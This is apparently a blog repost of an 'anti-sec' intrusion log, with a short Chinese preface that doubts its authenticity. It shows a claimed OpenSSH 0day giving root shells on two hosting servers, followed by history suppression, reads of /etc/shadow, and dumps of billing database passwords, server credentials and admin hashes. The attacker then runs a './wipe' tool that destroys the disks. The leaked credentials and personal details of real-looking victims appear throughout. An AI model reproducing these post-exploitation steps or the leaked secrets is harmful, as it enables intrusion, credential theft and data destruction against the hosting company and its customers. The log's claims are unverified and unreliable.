0day-openssh-remote-exploit

Hack 2010-05-24

openssh 4.3可是redhat enterprise linux 5.3的标配,文中的两个tgz也无法下载了。不知真假,仅供娱乐。

anti-sec:~/pwn# ./map ssanz.net

IP: 66.197.143.133 ( osiris.ssanz.net )
WWW: Apache/2.2.11
SSH: SSH-2.0-OpenSSH_4.3

IP: 66.197.204.101 ( devil.ssanz.net )
WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5
mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
SSH: SSH-2.0-OpenSSH_4.3

anti-sec:~/pwn# cd xpl/

anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.143.133 -p 22

  [+] 0wn0wn – anti-sec group
  [+] Target: 66.197.143.133
  [+] SSH Port: 22

  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

sh-3.2# export HISTFILE=/dev/null

sh-3.2# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

sh-3.2# uname -a
Linux osiris.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata
#1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux

sh-3.2# head -n1 /etc/shadow
root:$1$t4e0hufX$UH4Q5jTj93EEAODNrSaWO/:14412:0:99999:7:::

sh-3.2# w
03:43:43 up 7 days, 54 min,  1 user,  load average: 9.01, 9.78,
10.73
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    125.238.144.224  20:17    7:26m 13:18  13:18  htop

sh-3.2# pwd
/root

sh-3.2# ls -la
total 3008
drwxr-x— 24 root     root        4096 Jul  4 03:43 .
drwxr-xr-x 27 root     root        4096 Jun 27 02:49 ..
- -rw——-  1 root     root         957 Jun 13 07:24 .accesshash
- -rw——-  1 root     root        1012 Jun  1 10:39 anaconda-ks.cfg
- -rw——-  1 root     root       15460 Jul  3 23:38 .bash_history
- -rw-r–r–  1 root     root          24 Jan  6  2007 .bash_logout
- -rw-r–r–  1 root     root         191 Jan  6  2007 .bash_profile
- -rw-r–r–  1 root     root         176 Jan  6  2007 .bashrc
drwxrwxrwx  3 therockm therockm    4096 Jun  5 07:26 bwm-ng-0.6
- -rw-r–r–  1 root     root      141564 Mar  1  2007 bwm-ng-
0.6.tar.gz
drwxr-xr-x  3 root     root        4096 Nov 15  2006 cmm
- -rw-r–r–  1 root     root       18656 Feb 28 11:32 cmm.tgz
drwxr-xr-x  3 root     root        4096 Nov  5  2006 cmq
- -rw-r–r–  1 root     root       14507 Oct 10  2008 cmq.tgz
drwxr-xr-x  4 root     root        4096 Jun  1 14:33 .cpanel
drwxr-xr-x  4 root     root        4096 Jun  1 17:10 cpanel3-skel
drwx——  3 root     root        4096 Jun  1 13:50 .cpobjcache
drwxr-xr-x 10 root     root        4096 Apr 13 16:17 csf
- -rw-r–r–  1 root     root      430121 May 15 12:07 csf.tgz
- -rw-r–r–  1 root     root         100 Jan  6  2007 .cshrc
drwx——  2 root     root        4096 Jun  1 13:54 .elinks
- -rw-r–r–  1 root     root     1176672 Jul  4 03:40 error_log
- -rw-r–r–  1 root     root          16 Jun  3 08:34 .forward
drwx——  3 root     root        4096 Jun  1 10:39 .gconf
drwx——  2 root     root        4096 Jun  1 10:39 .gconfd
drwxr-xr-x  4 root     root        4096 Jun 10 23:42 .gem
drwx——  2 root     root        4096 Jun  1 13:55 .gnupg
drwxrwxrwx  5 theweath theweath    4096 Jun  1 17:13 htop-0.8.1
- -rw-r–r–  1 root     root      414870 Sep 23  2008 htop-
0.8.1.tar.gz
- -rw-r–r–  1 root     root         561 Jun 27 02:48 .htoprc
- -rw-r–r–  1 root     root        8144 Jun  6 19:23 index.html
- -rw-r–r–  1 root     root        4246 Jun  1 10:39
install.log.syslog
drwxr-xr-x  6      500 root        4096 Sep 13  2005 iptraf-3.0.0
- -rw-r–r–  1 root     root           0 Jun 27 09:21 iptraf-
3.0.0.tar.gz
- -rw-r–r–  1 root     root           0 Jun 27 09:22 iptraf-
3.0.0.tar.gz.1
- -rw-r–r–  1 root     root           0 Jun 27 09:24 iptraf-
3.0.0.tar.gz.2
- -rw-r–r–  1 root     root      575169 Jun 27 09:26 iptraf-
3.0.0.tar.gz.3
drwx——  6 root     root        4096 Jun  1 14:21 .MirrorSearch
- -rw——-  1 root     root          61 Jun 12 21:04 .my.cnf
- -rw——-  1 root     root         139 Jul  3 10:51 .mysql_history
- -rwxrwxrwx  1 root     root       38688 Dec  1  2008 mysqltuner.pl
- -rw-r–r–  1 root     root         264 Jul  2 21:43 .pearrc
drwxr-xr-x  2 root     root        4096 Jun  1 17:04 public_ftp
drwxr-xr-x  3 root     root        4096 Jun  1 17:04 public_html
- -rw——-  1 root     root        1024 Jun  7 19:50 .rnd
drwx——  3 root     root        4096 Jun  1 14:29 .spamassassin
drwx——  2 root     root        4096 Jun  2 06:41 .ssh
- -rw-r–r–  1 root     root         129 Jan  6  2007 .tcshrc
drwxr-xr-x  3 root     root        4096 Jun  7 21:54 tmp
- -rw——-  1 root     root           0 Jun  7 22:01 .trustwavereqs
drw——-  2 root     root        4096 Jun  3 08:18 whmrbackups
drw——-  3 root     root        4096 Jun 10 08:25 whmrcorebackups

sh-3.2# cat .bash_history
htop
htop
p
htop
tail -f /var/log/secure
tail -f /var/log/secure
[snip]
nano highperformance.conf
service httpd restart
nano highperformance.conf
service httpd restart
nano highperformance.conf
nano httpd.conf
nano php.conf
ls
nano modsec2.conf
ls
[snip]
nano visit4cash.net.conf
cd ..
[snip]
netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n ps -aux|grep -i HTTP|wc -l w bwm-ng [snip] netstat -plan|grep :80|awk {.print $5.}|cut -d: -f 1|sort|uniq -
c|sort -n
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -
c|sort -n
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -
c|sort -n
netstat -ntu | awk .{print $5}. | cut -d: -f1 | sort | uniq -c | sort -n netstat -an | awk ‘{print $4}’ | awk -F”:” ‘{print $2}’ | sort -n -u netstat -nat | awk ‘{print $6}’ | sort | uniq -c | sort -n netstat -nat |grep 202.54.1.10 | awk ‘{print $6}’ | sort | uniq -c
| sort -n
netstat -atun | awk ‘{print $5}’ | cut -d: -f1 | sed -e ‘/^$/d’
|sort | uniq -c | sort -n
[snip]
/sbin/iptables -A INPUT -i eth0 -p tcp –tcp-flags ALL ACK,RST,SYN,FIN -j Drop /sbin/iptables -A INPUT -i eth0 -p tcp –tcp-flags SYN,FIN SYN,FIN – j Drop /sbin/iptables -A INPUT -i eth0 -p tcp –tcp-flags SYN,RST SYN,RST – j Drop [snip] service cups stop chkconfig cups off service nfslock stop chkconfig nfslock off service rpcidmapd stop chkconfig rpcidmapd off service bluetooth stop chkconfig bluetooth off service anacron stop chkconfig anacron off service avahi-daemon stop chkconfig avahi-daemon off service hidd stop chkconfig hidd off service pcscd stop chkconfig pcscd off [snip]
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal -
iso
screen wget http://www.remote-exploit.org/cgi -
bin/fileget?version=bt4-prefinal-iso
htop
screen wget http://www.remote-exploit.org/cgi -
bin/fileget?version=bt4-beta-iso
[snip]
wget http://fullhide.info/backup-6.24.2009_18-13-16_fullhide.tar.gz
htop
[snip]
wget ftp://iptraf.seul.org/pub/iptraf/iptraf-3.0.0.tar.gz
wget ftp://the.wiretapped.net/pub/security/network -
monitoring/iptraf/iptraf-3.0.00.tar.gz
[snip]
wget http://www.logview.org/logview-install
chmod +x logview-install
./logview-install
rm -rf logview-install

sh-3.2# grep sec /etc/userdomains
affiliatesecrets.wecloak.info: wecloaki
infosecawareness.info: andlyssa
secproxy.info: secproxy
infosecawareness.andly.ssanz.net: andlyssa
greycloud.nakedinsects.com: greyclou
serversecuritynz.com: forumz
orac.nakedinsects.com: oracnz
infernal.nakedinsects.com: infernal
nakedinsects.com: ni
fluffy.nakedinsects.com: fluffy
quickclix.orac.nakedinsects.com: oracnz
seco39.ssanz.net: secossan

sh-3.2# lastlog | grep -v Never
Username         Port     From             Latest
root             pts/1    125.238.144.224  Fri Jul  3 20:27:03 -
0400 2009
simmobim         pts/0    118.69.80.114    Fri Jun 12 00:22:04 -
0400 2009
mattss           pts/1    118.90.48.0      Sun Jun 21 04:44:58 -
0400 2009
etasmtco         pts/0    189.31.24.129    Sat Jun 20 10:14:51 -
0400 2009

sh-3.2# cd ~billing
sh-3.2# ls -la
total 301252
drwx–x–x  15 billing billing     4096 Jun 28 02:08 .
drwx–x–x 737 root    root       20480 Jul  4 00:37 ..
lrwxrwxrwx   1 billing billing       33 Jun  2 01:58 access-logs ->
/usr/local/apache/domlogs/billing
- -rw——-   1 billing billing 87744924 Jun 14 12:33 backup-
6.14.2009_12-32-41_billing.tar.gz
- -rw——-   1 billing billing 92931478 Jun 28 02:08 backup-
6.28.2009_02-06-29_billing.tar.gz
- -rw——-   1 billing billing 84475934 Jun  3 06:33 backup-
6.3.2009_06-32-54_billing.tar.gz
- -rw——-   1 billing billing 42341015 May 31 21:42 backup-
billing9912.tar.gz
- -rw-r–r–   1 billing billing       24 May 27  2008 .bash_logout
- -rw-r–r–   1 billing billing      176 May 27  2008 .bash_profile
- -rw-r–r–   1 billing billing      124 May 27  2008 .bashrc
- -rw——-   1 billing billing       17 May 27  2008 .contactemail
drwxr-xr-x   5 billing billing     4096 May  8 02:48 .cpanel
- -rw-r—–   1 billing billing        0 Apr  4 06:32 cpbackup-
exclude.conf
drwxr-xr-x   2 billing billing     4096 Jun  2 01:57 cpmove.psql
drwxr-xr-x   3 billing billing     4096 Nov 12  2008
cpmove.psql.1240007789
drwxr-xr-x   2 billing billing     4096 Apr 16 23:24
cpmove.psql.1243922290
- -rw-r–r–   1 billing billing   532304 Jul  4 03:45 error_log
drwxr-x—   4 billing mail        4096 Jan 19 21:39 etc
drwxr-x—   2 billing nobody      4096 May 27  2008 .htpasswds
- -rw-r–r–   1 billing billing        7 Nov 12  2008 .lang
- -rw——-   1 billing billing       15 Jun 28 02:07 .lastlogin
drwxrwx—  10 billing billing     4096 Jul  2 21:43 mail
drwxr-xr-x   4 billing billing     4096 Nov 12  2008 .mozilla
drwxr-xr-x   3 billing billing     4096 Apr 29  2008 public_ftp
drwxr-x—  24 billing nobody      4096 Jun 28 02:55 public_html
drwx——   4 billing billing     4096 Jun  7 21:53 ssl
drwxr-xr-x   7 billing billing     4096 Feb 25 17:59 tmp
drwx——   2 billing billing     4096 May 27  2008 .trash
lrwxrwxrwx   1 billing billing       11 Jun  2 01:58 www ->
public_html
- -rw-r–r–   1 billing billing      658 May 27  2008 .zshrc

sh-3.2# cd www/

sh-3.2# ls
admin                 banned.php             configuressl.php
domainchecker.php  init.php             logout.php
postinfo.html       templates        viewticket.php  whois.php
affiliates.php        billing                contact.php
downloads          installmingchowping  modules
_private            templates_c      _vti_bin
aff.php               cart.php               creditcard.php
downloads.php      knowledgebase.php    networkissues.php
register.php        tutorials.php    _vti_cnf
announcements.php     cgi-bin                dbconnect.php
htaccess.txt       lang                 networkissuesrss.php
serverstatus.php    upgrade          _vti_inf.html
announcementsrss.php  clientarea.php         display.php
images             libs                 order.php
status              upgrade.php      _vti_log
announcements.xml     configuration.php      dl.php
includes           link.php             passwordreminder.php
submitticket.php    viewemail.php    _vti_pvt
attachments           configuration.php.new  dologin.php
index.php          login.php            pipe
supporttickets.php  viewinvoice.php  _vti_txt

sh-3.2# cat configuration.php
<?php
$license=”93881365561d”;
$db_host = “localhost”;
$db_username = “billing_billusr”;
$db_password = “X2qL6:qWCCb6″;
$db_name = “billing_billing”;
$cc_encryption_hash =
“57jR9sVyPKcDvZ4Ppy4I56sjYLI6mmEjhPQJ1sEAqBw7O952JlkTlrAbzLLmTx9K”;
$templates_compiledir = “templates_c/”;
?>

sh-3.2# mysql
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 11021136
Server version: 5.0.81-community MySQL Community Edition (GPL)

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

mysql> use billing_billing;

Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A

Database changed

mysql> show tables;
+—————————-+
| Tables_in_billing_billing  |
+—————————-+
| mod_ipmanager              |
| mod_ipmonitor              |
| tblaccounts                |
| tblactivitylog             |
| tbladdons                  |
| tbladminlog                |
| tbladminperms              |
| tbladminroles              |
| tbladmins                  |
| tbladminsecurityquestions  |
| tblaffiliates              |
| tblaffiliatesaccounts      |
| tblaffiliateshistory       |
| tblaffiliatespending       |
| tblaffiliateswithdrawals   |
| tblannouncements           |
| tblbannedemails            |
| tblbannedips               |
| tblbillableitems           |
| tblbrowserlinks            |
| tblcalendar                |
| tblcancelrequests          |
| tblclientgroups            |
| tblclients                 |
| tblconfiguration           |
| tblcontacts                |
| tblcredit                  |
| tblcurrencies              |
| tblcustomfields            |
| tblcustomfieldsvalues      |
| tbldomainpricing           |
| tbldomains                 |
| tbldomainsadditionalfields |
| tbldownloadcats            |
| tbldownloads               |
| tblemails                  |
| tblemailtemplates          |
| tblfraud                   |
| tblgatewaylog              |
| tblhosting                 |
| tblhostingaddons           |
| tblhostingconfigoptions    |
| tblinvoiceitems            |
| tblinvoices                |
| tblknowledgebase           |
| tblknowledgebasecats       |
| tblknowledgebaselinks      |
| tbllinks                   |
| tblnetworkissues           |
| tblnotes                   |
| tblorders                  |
| tblpaymentgateways         |
| tblpricing                 |
| tblproductconfiggroups     |
| tblproductconfiglinks      |
| tblproductconfigoptions    |
| tblproductconfigoptionssub |
| tblproductgroups           |
| tblproducts                |
| tblpromotions              |
| tblquoteitems              |
| tblquotes                  |
| tblregistrars              |
| tblservers                 |
| tblsslorders               |
| tbltax                     |
| tblticketbreaklines        |
| tblticketdepartments       |
| tblticketescalations       |
| tblticketlog               |
| tblticketmaillog           |
| tblticketnotes             |
| tblticketpredefinedcats    |
| tblticketpredefinedreplies |
| tblticketreplies           |
| tbltickets                 |
| tblticketspamfilters       |
| tbltodolist                |
| tblupgrades                |
| tblwhoislog                |
+—————————-+
80 rows in set (0.00 sec)

mysql> select name,ipaddress,hostname,username,password from
tblservers;
+————–+—————-+——————+———-+—–
- ——————————————————————–
- -+
| name         | ipaddress      | hostname         | username |
password
     |
+————–+—————-+——————+———-+—–
- ——————————————————————–
- -+
| Osiris       | 66.197.143.133 | Osiris.ssanz.net | ssanz    |
J4WILwNJpxR0KhyuPspLOT37zLzLrZ1wyqctabXg3co=
     |
| Osiris-Radio | 66.197.143.133 | Osiris.ssanz.net | root     |
+V876e3z7tGn9HXEcOG1TJVPaSsGbj31MnsZ2lw52buNutqcpfBhrPVsKdDssqrh7eDF
8g== |
| Devil        | 66.197.204.101 | devil.ssanz.net  | root     |
n/a/WSvQJp/++la5CREbl9QijpppzdxP0GjijQRXst2nag9E9PuTVrRO3A==
     |
+————–+—————-+——————+———-+—–
- ——————————————————————–
- -+
3 rows in set (0.00 sec)

mysql> select firstname,lastname,email,username,password from
tbladmins;
+———–+———-+—————–+———-+—————
- ——————-+
| firstname | lastname | email           | username | password
                   |
+———–+———-+—————–+———-+—————
- ——————-+
| Logan     | Douglas  | Logan@ssanz.net | Admin    |
c6df529826cf16ac5bedb424d8ac972b |
+———–+———-+—————–+———-+—————
- ——————-+
1 row in set (0.06 sec)

mysql> quit
Bye
sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda5             2.0G  477M  1.4G  26% /
/dev/sda8             875G  147G  684G  18% /home
/dev/sda3             9.7G  6.8G  2.5G  74% /usr
/dev/sda2             9.7G  7.0G  2.3G  76% /var
/dev/sda1              99M   23M   72M  24% /boot
/dev/sda6             996M   64M  881M   7% /tmp
tmpfs                 3.9G     0  3.9G   0% /dev/shm
/dev/sdb1             459G  163G  273G  38% /backup

sh-3.2# ./wipe

sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda5              64Z   64Z  1.5G 100% /
/dev/sda8              64Z   64Z  729G 100% /home
/dev/sda3              64Z   64Z  3.0G 100% /usr
/dev/sda2              64Z   64Z  3.0G 100% /var
/dev/sda1              16Z   16Z     0 100% /boot
/dev/sda6              64Z   64Z  933M 100% /tmp
tmpfs                 3.9G     0  3.9G   0% /dev/shm
/dev/sdb1              64Z   64Z  296G 100% /backup

sh-3.2# exit
exit

- ———————————–

osiris   [ DOWN ]
devil   [  UP  ]

- ———————————–

anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.204.101 -p 22

  [+] 0wn0wn – anti-sec group
  [+] Target: 66.197.204.101
  [+] SSH Port: 22

  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

sh-3.2# export HISTFILE=/dev/null

sh-3.2# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

sh-3.2# uname -a
Linux devil.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux

sh-3.2# head -n1 /etc/shadow
root:$1$BitobdhB$SAscpWG4O51UZQzxpBxbI1:14407:0:99999:7:::

sh-3.2# w
04:10:20 up 4 days, 12:11,  1 user,  load average: 3.25, 2.09, 1.68
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    125.238.144.224  20:18    7:51m  6:38   6:38  htop

sh-3.2# pwd
/root

sh-3.2# ls -la
total 1232
drwxr-x— 23 root root   4096 Jul  4 04:06 .
drwxr-xr-x 25 root root   4096 Jun 29 14:33 ..
- -rw——-  1 root root    957 Jun 13 05:20 .accesshash
- -rw——-  1 root root    937 Jun 12 00:01 anaconda-ks.cfg
- -rw——-  1 root root   7258 Jun 30 10:03 .bash_history
- -rw-r–r–  1 root root     24 Jan  6  2007 .bash_logout
- -rw-r–r–  1 root root    191 Jan  6  2007 .bash_profile
- -rw-r–r–  1 root root    176 Jan  6  2007 .bashrc
drwxrwxrwx  3 1000 1000   4096 Jun 12 04:45 bwm-ng-0.6
- -rw-r–r–  1 root root 141564 Mar  1  2007 bwm-ng-0.6.tar.gz
drwxr-xr-x  3 root root   4096 Nov  5  2006 cmq
- -rw-r–r–  1 root root  14507 Oct 10  2008 cmq.tgz
drwxr-xr-x  4 root root   4096 Jun 12 02:51 .cpanel
drwxr-xr-x  4 root root   4096 Jun 12 03:26 cpanel3-skel
drwx——  3 root root   4096 Jun 12 00:17 .cpobjcache
drwxr-xr-x  2 root root   4096 Aug 21  2006 cse
- -rw-r–r–  1 root root  12207 Oct 10  2008 cse.tgz
drwxr-xr-x 10 root root   4096 Jun  5 05:05 csf
- -rw-r–r–  1 root root 431490 Jun  5 10:52 csf.tgz
- -rw-r–r–  1 root root    100 Jan  6  2007 .cshrc
drwx——  2 root root   4096 Jun 12 01:51 .elinks
- -rw-r–r–  1 root root     16 Jun 13 15:33 .forward
drwx——  3 root root   4096 Jun 11 23:59 .gconf
drwx——  2 root root   4096 Jun 11 23:59 .gconfd
drwxr-xr-x  4 root root   4096 Jun 12 04:29 .gem
drwx——  2 root root   4096 Jun 12 01:53 .gnupg
drwxrwxrwx  6 1002 1002   4096 Jun 12 04:24 htop-0.8.1
- -rw-r–r–  1 root root 414870 Sep 23  2008 htop-0.8.1.tar.gz
- -rw-r–r–  1 root root    561 Jun 12 23:31 .htoprc
- -rw-r–r–  1 root root   4239 Jun 12 00:01 install.log.syslog
drwx——  6 root root   4096 Jun 12 02:33 .MirrorSearch
- -rw——-  1 root root     37 Jun 12 02:11 .my.cnf
drwxr-xr-x  3 1000 1000   4096 Jun 12 05:42 mytop-1.6
- -rw-r–r–  1 root root  19720 Feb 16  2007 mytop-1.6.tar.gz
- -rw-r–r–  1 root root    264 Jun 23 00:23 .pearrc
drwxr-xr-x  2 root root   4096 Jun 12 03:21 public_ftp
drwxr-xr-x  3 root root   4096 Jun 12 03:21 public_html
- -rw——-  1 root root   1024 Jun 12 02:50 .rnd
drwx——  3 root root   4096 Jun 12 02:41 .spamassassin
drwx——  2 root root   4096 Jun 22 09:11 .ssh
- -rw-r–r–  1 root root    129 Jan  6  2007 .tcshrc
drwxr-xr-x  3 root root   4096 Jun 12 02:40 tmp
drwxr-xr-x  2 root root   4096 Jun 16 19:23 .wapi

sh-3.2# cat .bash_history
sh hninst.sh
passwd
fdisk -l
exit
w
history
screen -ls
screen -r 2785.pts-0.devil
exit
wget http://merovingian.net.nz/htop-0.8.1.tar.gz
[snip]
csf -a 125.238.144.110
exit
cd /home
ls
wget http://visit4cash.net/backup-6.12.2009_06-46-12_visit4ca.tar.gz
[snip]
wget http://visit4cash.net/mainfiles.tar.gz
mv mainfiles.tar.gz /home/visit4ca/public_html cd /home cd visit4ca cd public_html ls tar zxvf mainfiles.tar.gz [snip] csf -d 89.165.50.38 netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.38.206.233 csf –restart netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n csf -d 118.94.59.33 netstat -anp |grep ‘tcp\|udp’ | awk ‘{print $5}’ | cut -d: -f1 | sort | uniq -c | sort -n [snip] screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Live/
i686/Fedora-11-i686-Live.iso
screen wget
http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedor
a/x86_64/iso/Fedora-11-x86_64-DVD.iso
screen wget
http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedor
a/x86_64/iso/Fedora-11-x86_64-netinst.iso

sh-3.2# cat /etc/userdomains
advertising.ssanz.net: adserver
forums.visit4cash.net: forumsv4
megacashzone.com: megacash
visit4cash.net: visit4ca
seanone.com: seanonec
backup2.ssanz.net: backup2
*: nobody

sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda3              31G  7.5G   22G  26% /
/dev/sdb1             452G   35G  394G   9% /home
/dev/sda1              99M   23M   72M  24% /boot
tmpfs                 495M  4.0K  495M   1% /dev/shm
/usr/tmpDSK           485M   14M  446M   3% /tmp

sh-3.2# who
root     pts/0        2009-07-03 20:18 (125.238.144.224)

sh-3.2# ./wipe

sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda3              64Z   64Z   24G 100% /
/dev/sdb1              64Z   64Z  417G 100% /home
/dev/sda1              16Z   16Z   77M 100% /boot
tmpfs                 495M  4.0K  495M   1% /dev/shm
/usr/tmpDSK           485M   14M  446M   3% /tmp

sh-3.2# exit
exit